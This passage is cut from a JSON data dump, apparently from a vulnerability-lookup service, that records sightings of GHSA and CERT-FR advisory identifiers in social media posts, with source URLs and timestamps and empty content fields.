"https://infosec.exchange/users/cve/statuses/113804792788825014", "content": "", "creation_timestamp": "2025-01-10T15:35:28.084489Z"}, {"uuid": "420a70bc-2a5b-404e-a7bf-27ea9191bd5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mgj3-g922-2r9v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804792804444750", "content": "", "creation_timestamp": "2025-01-10T15:35:28.293679Z"}, {"uuid": "5b6df651-7526-4622-b28a-0eebafe97c81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9x2j-pw3h-p53f", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804792818857490", "content": "", "creation_timestamp": "2025-01-10T15:35:28.520094Z"}, {"uuid": "5ce0c9d9-d510-42b0-9d3b-b5416dbe64a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m8gj-6r85-3r6m", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113839713874243661", "content": "", "creation_timestamp": "2025-01-16T19:36:21.537197Z"}, {"uuid": "194ecbc4-76bc-403e-a2f2-f023ab5e1d5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f27p-cmv8-xhm6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113783769484392065", "content": "", "creation_timestamp": "2025-01-06T22:28:57.771086Z"}, {"uuid": "ad8ec95c-f908-4179-be4b-9729242598bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mm4-fcfv-55x3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113824831972683526", "content": "", "creation_timestamp": "2025-01-14T04:31:41.731886Z"}, {"uuid": "ae45d39a-59e0-4045-a9fe-20141be1cf22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88c9-gpgh-6vvr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113824831940627455", "content": "", "creation_timestamp": "2025-01-14T04:31:41.949412Z"}, {"uuid": "c4a3032f-3721-481a-8bd9-101f3f3a601a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r8fq-hqr2-v5j9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113824831986416116", "content": "", "creation_timestamp": "2025-01-14T04:31:42.122283Z"}, {"uuid": "eb655c7a-bc5e-43fa-9986-ab9aa22fe2e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v68m-2rvf-8r25", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113824890988544780", "content": "", "creation_timestamp": "2025-01-14T04:46:42.217227Z"}, {"uuid": "95e4433b-b0e1-4d50-ac54-1b4b1d27203a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qfmh-qrr2-5c4g", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113824891003734132", "content": "", "creation_timestamp": "2025-01-14T04:46:42.499955Z"}, {"uuid": "d7d2ac43-97c2-40f8-867e-9bb8143fb3f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rp2v-7hpw-m6qc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113824891018651073", "content": "", "creation_timestamp": "2025-01-14T04:46:42.667856Z"}, {"uuid": "acf666fd-5a9c-4723-ab5d-339342e65705", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xrjq-57mq-4hf8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113794159917395964", "content": "", "creation_timestamp": "2025-01-08T18:31:23.318122Z"}, {"uuid": "9562d179-901a-427b-bcfc-78f5dc3c9b28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mrhp-wfp2-59h5", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113794159931596292", "content": "", "creation_timestamp": "2025-01-08T18:31:23.442846Z"}, {"uuid": "a9d1b95f-1998-4288-a96c-af572eb39a68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w7hp-2w2c-p636", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113794159945737703", "content": "", "creation_timestamp": "2025-01-08T18:31:23.646206Z"}, {"uuid": "00a86b2c-bd38-49d8-9b35-fb61dd1b8223", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7pq6-v88g-wf3w", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113834328305491166", "content": "", "creation_timestamp": "2025-01-15T20:46:44.294558Z"}, {"uuid": "4e202b76-3ada-4122-9f07-339602b52475", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qwhf-px96-7f6v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113845537604687570", "content": "", "creation_timestamp": "2025-01-17T20:17:24.687491Z"}, {"uuid": "a622addd-dd91-4e90-8649-d7310a3f98ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3mfw-fhfp-mgrv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113845537620977187", "content": "", "creation_timestamp": "2025-01-17T20:17:24.913067Z"}, {"uuid": "725fd574-f4aa-41b9-a68b-aa64fb77c439", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qwhf-px96-7f6v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113845552224560073", "content": "", "creation_timestamp": "2025-01-17T20:21:07.668278Z"}, {"uuid": "372c4fd1-f09c-4c13-8a07-fda4b1b6bd20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3mfw-fhfp-mgrv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113845552239579550", "content": "", "creation_timestamp": "2025-01-17T20:21:07.905251Z"}, {"uuid": "250dcef8-9b74-446a-b379-712128230ef7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4mq-x674-ff73", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113845625669555396", "content": "", "creation_timestamp": "2025-01-17T20:39:48.332807Z"}, {"uuid": "ee6dd9a8-96d6-401e-84c6-6e5059f4fc4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cm7w-99v2-prrq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113845775391436167", "content": "", "creation_timestamp": "2025-01-17T21:17:52.856031Z"}, {"uuid": "5993e742-026d-42bd-8eed-2c98ccc59689", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3mfw-fhfp-mgrv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113845805170753575", "content": "", "creation_timestamp": "2025-01-17T21:25:27.904072Z"}, {"uuid": "6f13c573-fd14-4b67-831f-3fca74403653", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cg87-wmx4-v546", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113845820383025414", "content": "", "creation_timestamp": "2025-01-17T21:29:19.389313Z"}, {"uuid": "9686e555-c0ed-4f33-8e77-1ee7bfcbdefb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c9p4-xwr9-rfhx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113846041447410284", "content": "", "creation_timestamp": "2025-01-17T22:25:32.678500Z"}, {"uuid": "405c3c91-792e-4e02-816e-098fe4bc41b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j3g9-wg22-v955", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113863162643434691", "content": "", "creation_timestamp": "2025-01-20T22:59:41.403830Z"}, {"uuid": "0596a44f-6198-4088-a20c-daa7ac8642e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vg7j-7cwx-8wgw", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lg2lhedcgo2e", "content": "", "creation_timestamp": "2025-01-19T00:37:53.250157Z"}, {"uuid": "52b1ff97-e18a-42ae-9f64-7e2cef2a6a89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m7xq-9374-9rvx", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lg2lj3zqda2i", "content": "", "creation_timestamp": "2025-01-19T00:38:51.782185Z"}, {"uuid": "1958d3a0-61dc-4dc4-a150-bdffecbe7a9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fqmf-w4xh-33rh", "type": "seen", "source": "https://gist.github.com/EliahKagan/0be3efbf0c9e6bebe115036caa457bbf", "content": "", "creation_timestamp": "2025-01-19T21:32:55.000000Z"}, {"uuid": "2571e5b0-1eaf-4ac1-a378-424ae8f8255d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r465-vhm9-7r5h", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113911519018810757", "content": "", "creation_timestamp": "2025-01-29T11:57:21.116690Z"}, {"uuid": "57a5ac8c-c31a-487c-86fe-6b99814ad6bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fc89-jghx-8pvg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113918130082310835", "content": "", "creation_timestamp": "2025-01-30T15:58:37.943973Z"}, {"uuid": "b92f62ca-bc14-4306-a5a5-a2ce7383737e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4phc-m2wm-p8x6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947287754913671", "content": "", "creation_timestamp": "2025-02-04T19:33:48.557878Z"}, {"uuid": "2631fbde-0961-420d-b687-49eb9fd1f2aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3327-6x79-q396", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947287785542382", "content": "", "creation_timestamp": "2025-02-04T19:33:49.033293Z"}, {"uuid": "c9b1da3e-f93f-4af9-8a71-418111a01d83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-23wx-5q5w-334w", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947287770888676", "content": "", "creation_timestamp": "2025-02-04T19:33:48.846031Z"}, {"uuid": "1619e122-dece-426f-a6bc-80e829253a40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98v2-f47x-89xw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113911519035869184", "content": "", "creation_timestamp": "2025-01-29T11:57:21.395577Z"}, {"uuid": "10fe1261-d368-4304-98f2-e350d3f08d1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q26p-9cq4-7fc2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113918161441788544", "content": "", "creation_timestamp": "2025-01-30T16:06:36.335559Z"}, {"uuid": "49c543f1-8196-456f-a507-93340eb6eb19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3lhc7g5lp432e", "content": "", "creation_timestamp": "2025-02-03T18:48:57.380914Z"}, {"uuid": "fe4e863d-b2c7-4853-91db-268a6681fb86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mmg3-567w-v9j2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114258175577877862", "content": "", "creation_timestamp": "2025-03-31T17:16:40.589098Z"}, {"uuid": "c2b2149c-b91c-44d9-abd8-735fd33146b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5h4h-2f46-r3c7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947591485236644", "content": "", "creation_timestamp": "2025-02-04T20:51:03.131530Z"}, {"uuid": "f690373f-208a-4d9c-ba88-b8887be03b33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3xg3-cgvq-2xwr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113912358145636993", "content": "", "creation_timestamp": "2025-01-29T15:30:45.019515Z"}, {"uuid": "2bff8a8e-7ea7-4e9b-98d4-bfcde649d4c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f8q2-7fv5-cg93", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113912358161091347", "content": "", "creation_timestamp": "2025-01-29T15:30:45.534030Z"}, {"uuid": "2299feac-f3e0-444d-a26f-821bb32dff13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2ccp-vqmv-4r4x", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113941862621519300", "content": "", "creation_timestamp": "2025-02-03T20:34:08.459586Z"}, {"uuid": "a33843ae-9b6c-4573-ad8b-64d11a2e02ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6x46-6w9f-ffv6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113941911640498304", "content": "", "creation_timestamp": "2025-02-03T20:46:35.646202Z"}, {"uuid": "81e1cdd3-153b-4b95-83cc-a177b6d66303", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-a910054a-1b1a0442aae5b72f", "content": "", "creation_timestamp": "2025-02-07T16:04:47.380157Z"}, {"uuid": "f4039e6e-a088-42bf-83fb-867e443e11ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2016-ALE-007", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvejmqgcv2d", "content": "", "creation_timestamp": "2025-01-29T16:15:46.143672Z"}, {"uuid": "f41cd2fa-6b56-4d09-ba98-3aedd0a30f0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hj49-h7fq-px5h", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113918942752937670", "content": "", "creation_timestamp": "2025-01-30T19:25:18.332738Z"}, {"uuid": "ddaf917d-08f9-414b-bf05-3743738fef52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/betterhn50.e-work.xyz/post/3lhcgnu365m2c", "content": "", "creation_timestamp": "2025-02-03T20:58:32.599790Z"}, {"uuid": "a529f52c-dfc0-42f6-9766-e80d79491b42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/gslin.bsky.social/post/3lhch3gb2fk2x", "content": "", "creation_timestamp": "2025-02-03T21:06:07.091976Z"}, {"uuid": "b07c0320-0888-46d9-ac79-03b4bf7d9a5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36gq-35j3-p9r9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113878400720241278", "content": "", "creation_timestamp": "2025-01-23T15:34:55.976435Z"}, {"uuid": "894a5a7a-81e5-47bc-940a-3db73511a10d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-005", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfhhmwlp2k", "content": "", "creation_timestamp": "2025-01-29T16:32:27.095553Z"}, {"uuid": "fd4a9a3f-97c8-4b2e-96bd-eeb80c56134d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9wqm-fg79-4748", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113883928607483631", "content": "", "creation_timestamp": "2025-01-24T15:00:44.712682Z"}, {"uuid": "b67c091c-189f-4006-beac-16a6fba1f000", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-004", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/113900736542112970", "content": "", "creation_timestamp": "2025-01-27T14:15:14.910692Z"}, {"uuid": "80bb424f-643c-4f85-b786-94430c7ebc74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-006", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfhsb6oc27", "content": "", "creation_timestamp": "2025-01-29T16:32:38.273394Z"}, {"uuid": "712f7dff-6411-4887-bb3c-2acf4b06ef32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-004", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lgq4ubscht2q", "content": "", "creation_timestamp": "2025-01-27T14:15:15.045131Z"}, {"uuid": "ea1512f1-da69-4f9a-800e-111cf9209c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-007", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfikue6s2d", "content": "", "creation_timestamp": "2025-01-29T16:33:04.064332Z"}, {"uuid": "6feb821b-39f8-447a-a841-7ef0d0995340", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-020", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfne6rev2g", "content": "", "creation_timestamp": "2025-01-29T16:35:44.841859Z"}, {"uuid": "4a61d95f-65b6-4a7a-99fc-dbd29fa17ed8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-008", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfio73oe24", "content": "", "creation_timestamp": "2025-01-29T16:33:07.502358Z"}, {"uuid": "202d64a5-be82-4e20-945d-a8493db897c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-009", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfivejvn2g", "content": "", "creation_timestamp": "2025-01-29T16:33:15.547314Z"}, {"uuid": "bb4e29f6-6f90-498d-9759-1332150dc104", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-010", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfiz45lu24", "content": "", "creation_timestamp": "2025-01-29T16:33:19.159014Z"}, {"uuid": "e9cf198a-1b92-44fa-92bd-6548c6a12307", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-011", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfjk55i52g", "content": "", "creation_timestamp": "2025-01-29T16:33:36.823685Z"}, {"uuid": "fc8e1a14-4755-4796-b8ff-4d1b91a5e19c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-012", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfjr3pnv2i", "content": "", "creation_timestamp": "2025-01-29T16:33:44.156616Z"}, {"uuid": "34a02676-62d0-4659-b0b8-2159a9d43529", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wg33-5h85-7q5p", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113958223039348997", "content": "", "creation_timestamp": "2025-02-06T17:54:47.839550Z"}, {"uuid": "53617f55-1e37-4d6e-9f36-45c2c96e7761", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2023-ALE-003", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvgcuqki22g", "content": "", "creation_timestamp": "2025-01-29T16:47:47.236167Z"}, {"uuid": "f48a54a0-6f94-4d49-84c0-808da3335f37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8m79-rmhw-rg84", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113919718883352677", "content": "", "creation_timestamp": "2025-01-30T22:42:41.592800Z"}, {"uuid": "d921cbd7-f103-49a6-b354-d2ca3160eabf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fcq8-jqq5-9xmh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113919718901044607", "content": "", "creation_timestamp": "2025-01-30T22:42:42.036578Z"}, {"uuid": "735e8d9f-32b1-439a-a27f-a07c0dd5d523", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://threatintel.cc/2025/02/03/amd-microcode-signature-verification-vulnerability.html", "content": "", "creation_timestamp": "2025-02-03T18:35:49.000000Z"}, {"uuid": "c5271543-43c0-4dfe-8b3f-806b6bcbed40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xfhv-wqj6-rx99", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113912714697083852", "content": "", "creation_timestamp": "2025-01-29T17:01:25.643067Z"}, {"uuid": "0f2d4d6a-3dde-47c2-8026-7eefcae30119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xr3m-6gq6-22cg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113906203889577977", "content": "", "creation_timestamp": "2025-01-28T13:25:38.659791Z"}, {"uuid": "4fd81091-c342-4fc0-8557-a730ef3754b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/nono2357.bsky.social/post/3lhcxkw3fbj2i", "content": "", "creation_timestamp": "2025-02-04T02:01:07.015312Z"}, {"uuid": "c16f406f-ec36-46ee-81bf-3493154e8187", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33g6-495w-v8j2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113912920293587523", "content": "", "creation_timestamp": "2025-01-29T17:53:42.810053Z"}, {"uuid": "65c00791-f400-43af-8c5d-ff8190b15920", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gmj9-h825-chq2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113878878549057346", "content": "", "creation_timestamp": "2025-01-23T17:36:27.095203Z"}, {"uuid": "e8283e71-bbcb-4aed-bab4-679fc26b8d5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3W2C-JFR2-9PG9", "type": "seen", "source": "https://t.me/brutsecurity/1432", "content": "", "creation_timestamp": "2026-07-09T03:00:09.954487Z"}, {"uuid": "a77a3234-5468-46e3-91ed-93b0ccedce28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/hnfeed.bsky.social/post/3lhd6ezr4zs2y", "content": "", "creation_timestamp": "2025-02-04T04:03:05.243759Z"}, {"uuid": "dfa5edfb-2c15-44ad-9492-d0c47a2f15be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-ff4bbbe6-58ed58dba88fdb03", "content": "", "creation_timestamp": "2025-02-07T11:34:45.852374Z"}, {"uuid": "e2e8ae16-652c-415a-8c8a-7fa949e2699c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 